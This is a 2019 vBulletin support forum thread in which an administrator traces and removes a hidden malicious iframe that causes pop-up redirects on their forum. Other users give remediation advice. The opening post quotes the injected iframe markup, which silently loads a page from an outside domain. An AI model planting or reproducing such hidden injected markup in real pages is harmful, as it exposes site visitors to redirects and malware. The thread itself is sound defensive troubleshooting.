Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 08 Nov 2019, 02:21
MrHorror MrHorror is offline
 
Join Date: Nov 2010
Question Malicious code found on forum

So we're running vb4.1.10 and I used chrome to inspect our page. Found this iframe:

<iframe src="//deloplen.com/fac.php" style="display: none;"></iframe>
#document

I need to remove it but have no idea where it's located. I checked multiple templates. Any ideas?
Reply With Quote
  #2  
Old 08 Nov 2019, 03:37
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
The most likely source is going to be a third party modification. Having said that vBulletin 4.1.1 is extremely outdated and has countless security holes which have been patched since its release. Is there a particular reason you're running that version? It would be advisable to upgrade to version 4.2.5 unless you have a compelling reason for keeping that version.
Reply With Quote
  #3  
Old 08 Nov 2019, 05:38
MrHorror MrHorror is offline
 
Join Date: Nov 2010
We’re running the patched version. We’re not planning on upgrading to 4.1.2 because we put so much work into skinning 4.1.10. Which was a pain to begin with. As for mods, we turned all plugins off and we still get pop up redirects from this site. Its cookie is also constantly found in our cookies list. Do you have any idea as to what template this code might be present in? Can iframe be executed from any template? It seems to be positioned in the body of the forum. Where would I find those templates. I’ve already combed:

Forum head
Forum header
All css templates
Forum footer

and a few others.

--------------- Added 08 Nov 2019 at 05:58 ---------------

Also since the source seems to be a php file, is it possible I could find the source of this malware in my vbulletin files in my file manager? Iíve read this same malware has been used on some wordpress forums and the source was discovered inside wordpress functions.php file.
Reply With Quote
  #4  
Old 08 Nov 2019, 13:06
Dave Dave is offline
 
Join Date: Jun 2010
Real name: Dave
It's really hard to say from our position. It can be anywhere from the database (datastore), any template (that is then injected into another template through injected code) or filesystem (.js or .php files).
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
Reply With Quote
  #5  
Old 08 Nov 2019, 19:15
Mark.B Mark.B is offline
 
Join Date: Feb 2004
There could be multiple unpatched security issues in a version that old. It really isn't plausible to secure it without upgrading. You would at the very least need to find a third party code auditor and pay them to audit the code for security flaws. Even then, if they aren't familiar with vBulletin code, there are no guarantees.

Outside of the navbar and activity stream there aren't major styling changes between 4.1.10 and 4.2.5. Rather than spend hours pouring over code hoping to find flaws, it would be far more efficient and a better use of time to upgrade to 4.2.5 and sort any styling problems out.
__________________
MARK.B (Member of the vB Support Team)
Reply With Quote
  #6  
Old 08 Nov 2019, 22:26
MrHorror MrHorror is offline
 
Join Date: Nov 2010
Question

Okay so doing some further inspecting? This code seems to be located in the body wrapper. Right above this: <!-- closing div for body_wrapper -->

So now I need to know what templates in my style manager give me access to editing the body wrapper?

Last edited by MrHorror; 08 Nov 2019 at 22:58.
Reply With Quote
  #7  
Old 10 Nov 2019, 22:26
MrHorror MrHorror is offline
 
Join Date: Nov 2010
Good news guys. I removed an add-on in our forum for 'twitbox,' an active twitter box that appears on the right side of the page so users can read our tweets. I scrubbed the code from multiple style templates and now...No more popups! The deloplen cookie is also gone completely.
Reply With Quote
  #8  
Old 22 Nov 2019, 11:09
markhendo1986 markhendo1986 is offline
 
Join Date: Jan 2008
Hi MrHorror,
I'm now experiencing the exact same issue as yourself with regards to spam delopen links opening in new tabs when clicking anything within the forum. I can see these links within an iFrame when inspecting the home page but like yourself, I'm not able to find out exactly which templates I need to clean to get rid of them.
Could you advise which templates were affected?
PS - To confirm, I do have the latest patched version of release v4.
Reply With Quote
  #9  
Old 22 Nov 2019, 20:21
MrHorror MrHorror is offline
 
Join Date: Nov 2010
Question

Hi. Do you have twitbox installed?
Reply With Quote
  #10  
Old 02 Dec 2019, 10:35
markhendo1986 markhendo1986 is offline
 
Join Date: Jan 2008
No, I don't have Twitbox. So was it just code from that plugin that you had to remove from your templates?
Reply With Quote
  #11  
Old 03 Dec 2019, 01:20
MrHorror MrHorror is offline
 
Join Date: Nov 2010
Lightbulb

Yeah. I basically combed all of the templates where the twitbox code was present and I deleted that code from all of my styles. I also deleted two suspicious plugins marked 'vbulletin' that had long strings of code marked 'Base 64.'
Reply With Quote
  #12  
Old 03 Dec 2019, 06:24
x iJailBreak x's Avatar
x iJailBreak x x iJailBreak x is offline
 
Join Date: Jan 2011
Originally Posted by MrHorror View Post
Yeah. I basically combed all of the templates where the twitbox code was present and I deleted that code from all of my styles. I also deleted two suspicious plugins marked 'vbulletin' that had long strings of code marked 'Base 64.'
Just in case you haven't already, I highly recommend updating all of your passwords. I would also inform your community that you have been hacked and that they should ensure they have updated their passwords, especially if they aren't using unique passwords for different sites.
__________________
Professional web developer & sysadmin. Former bad man.
Reply With Quote
Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
Administrative and Maintenance Tools secureWorks: Protect your forum from accidental / malicious thread delete ibautocommunity vBulletin 3.7 Add-ons 4 23 Aug 2009 12:15



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 04:01.

Layout Options | Width: Wide Color: